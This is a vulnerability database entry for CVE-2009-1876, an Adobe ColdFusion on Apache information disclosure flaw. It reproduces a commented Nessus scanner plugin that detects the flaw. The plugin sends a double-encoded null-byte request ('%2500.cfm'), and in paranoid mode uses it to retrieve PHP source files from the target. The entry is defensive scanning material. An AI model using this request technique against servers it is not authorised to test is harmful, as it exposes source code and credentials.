Vulnerabilities > CVE-2009-1876 - Unspecified vulnerability in Adobe Coldfusion

CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE

Summary

Adobe ColdFusion 8.0.1 and earlier might allow attackers to obtain sensitive information via unspecified vectors, related to a "double-encoded null character vulnerability."

Nessus

NASL family: CGI abuses
NASL id: COLDFUSION_APACHE_DOUBLE_NULL_INFO_DISCLOSURE.NASL
description: The remote host is running a version of ColdFusion on Apache that is affected by an information disclosure vulnerability. When requesting a non-ColdFusion file, appending a double-encoded null byte and an extension handled by ColdFusion (such as '.cfm') will display the contents of that file.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 40667
published: 2009-08-21
reporter: This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/40667
title: Adobe ColdFusion On Apache Double Encoded NULL Byte Request File Content Disclosure
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");


if (description)
{
  # Registration pass: when the scanner loads the plugin with `description`
  # set, only the metadata below is recorded and the script exits without
  # touching any target.
  script_id(40667);
  script_version("1.15");
  script_cvs_date("Date: 2018/11/15 20:50:16");

  # Public identifiers for the flaw this plugin checks.
  script_cve_id("CVE-2009-1876");
  script_bugtraq_id(36096);
  script_xref(name:"Secunia", value:"36329");

  script_name(english:"Adobe ColdFusion On Apache Double Encoded NULL Byte Request File Content Disclosure");
  script_summary(english:"Tries to retrieve script code.");

  # Finding text shown in the scan report: what the issue is, how it can be
  # abused, and what to do about it.
  script_set_attribute(attribute:"synopsis", value:
"An application running on the remote web server is affected by an
information disclosure vulnerability.");
  script_set_attribute( attribute:"description", value:
"The remote host is running a version of ColdFusion on Apache that is
affected by an information disclosure vulnerability. When requesting a
non-ColdFusion file, appending a double-encoded null byte and an
extension handled by ColdFusion (such as '.cfm') will display the
contents of that file. A remote attacker can exploit this to view the
source code of other files on the web server (e.g. PHP scripts), which
may contain credentials or other sensitive information.

This vulnerability is similar to CVE-2006-5858, which affected systems
running ColdFusion on IIS. This vulnerability reportedly only affects
systems running ColdFusion on Apache.");
  script_set_attribute(attribute:"see_also", value:"https://www.adobe.com/support/security/bulletins/apsb09-12.html");
  script_set_attribute(attribute:"solution",value:"Apply the relevant hotfix referenced in the vendor's advisory.");
  # CVSS v2 base/temporal and v3 base vectors. The temporal vector records an
  # unproven exploit (E:U), an official vendor fix (RL:OF) and a confirmed
  # report (RC:C); the two "exploit" attributes below restate the E:U part.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  # Disclosure, patch and plugin publication dates.
  script_set_attribute(attribute:"vuln_publication_date", value:"2009/08/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/08/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/08/21");

  # "exploited_by_nessus" flags that the check actively triggers the flaw
  # rather than inferring it from a version banner.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:adobe:coldfusion");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # ACT_ATTACK category: the plugin sends requests to the target.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.");

  # Scheduling constraints: runs only after the Apache and ColdFusion
  # detection plugins have populated the KB keys required below, on the
  # web ports listed.
  script_dependencies("apache_http_version.nasl", "coldfusion_detect.nasl");
  script_require_ports("Services/www", 80, 8500);
  script_require_keys("installed_sw/Apache", "installed_sw/ColdFusion");
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

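app = 'ColdFusion';
# Both Apache and ColdFusion must have been detected somewhere on the host;
# get_install_count() exits the script otherwise.
get_install_count(app_name:app, exit_if_zero:TRUE);
get_install_count(app_name:"Apache", exit_if_zero:TRUE);
port = get_http_port(default:80);
# Confirms Apache is the server behind this port. The return value was
# previously stored in an unused variable; only the call itself matters.
get_single_install(app_name:"Apache", port:port);

# Request a file name that cannot exist (script name plus current time),
# suffixed with a double-encoded NUL and a ColdFusion extension. On an
# affected host ColdFusion ignores everything after the NUL, so its error
# page echoes the original (non-.cfm) name.
doc = '/' + SCRIPT_NAME - ".nasl" + '-' + unixtime();
url = doc + '%2500.cfm';
res = http_send_recv3(
  method       : "GET",
  item         : url,
  port         : port,
  fetch404     : TRUE,
  exit_on_fail : TRUE
);

# Without the JRun error page echoing the original name there is nothing to
# report; audit() exits the script.
if (
  '<head><title>JRun Servlet Error</title>' >!< res[2] ||
  doc + '</pre>' >!< res[2]
) audit(AUDIT_LISTEN_NOT_VULN, "Apache", port);

# Paranoid scans go one step further and try to retrieve the source of a PHP
# file already known from the KB, so the finding carries direct evidence.
if (report_paranoia == 2)
{
  max_files = 10;
  tried = 0;
  # make_list() flattens the KB lookup into a plain list (empty when nothing
  # was recorded), so the loop below needs no NULL special case.
  files = make_list(get_kb_list("www/"+port+"/content/extensions/php"));

  foreach file (files)
  {
    # Bound the number of extra requests per host. The counter is advanced
    # for every file examined, not only for inconclusive ones as before, so
    # at most max_files files are fetched regardless of how each attempt ends.
    tried++;
    if (tried > max_files) break;

    # Same technique as above, aimed at a real file.
    source_url = file + '%2500.cfm';
    source = http_send_recv3(
      method       : "GET",
      item         : source_url,
      port         : port,
      exit_on_fail : TRUE
    );

    # No PHP open tag means this request did not yield source; try the next.
    if ('<?' >!< source[2]) continue;

    # Fetch the page normally. If Apache serves the same bytes, what we saw
    # was just the rendered output and proves nothing.
    html = http_send_recv3(
      method       : "GET",
      item         : file,
      port         : port,
      exit_on_fail : TRUE
    );
    if (source[2] == html[2]) continue;

    # Source differs from the rendered page: file content was disclosed.
    # Note that the verbose report embeds up to 10 lines of that content, so
    # the scan output itself may hold sensitive material.
    if (report_verbosity > 0)
    {
      report =
        '\n' +
        'Nessus requested the following URL :\n\n' +
        '  ' + build_url(qs:source_url, port:port) + '\n' +
        '\nwhich yielded the following source code (limited to 10 lines):'+
        '\n\n' +
        '  ' + beginning_of_response(resp:source[2],max_lines:10) + '\n';
      security_warning(port:port, extra:report);
    }
    else security_warning(port);
    exit(0);
  }
}

# Either the scan is not paranoid or no PHP source could be retrieved:
# report on the strength of the error-page evidence alone.
if (report_verbosity > 0)
{
  report =
    '\n' +
    'Nessus verified this based on the error message generated by\n' +
    'requesting the following URL :\n\n' +
    '  ' + build_url(qs:url, port:port) + '\n';
  security_warning(port:port, extra:report);
}
else security_warning(port);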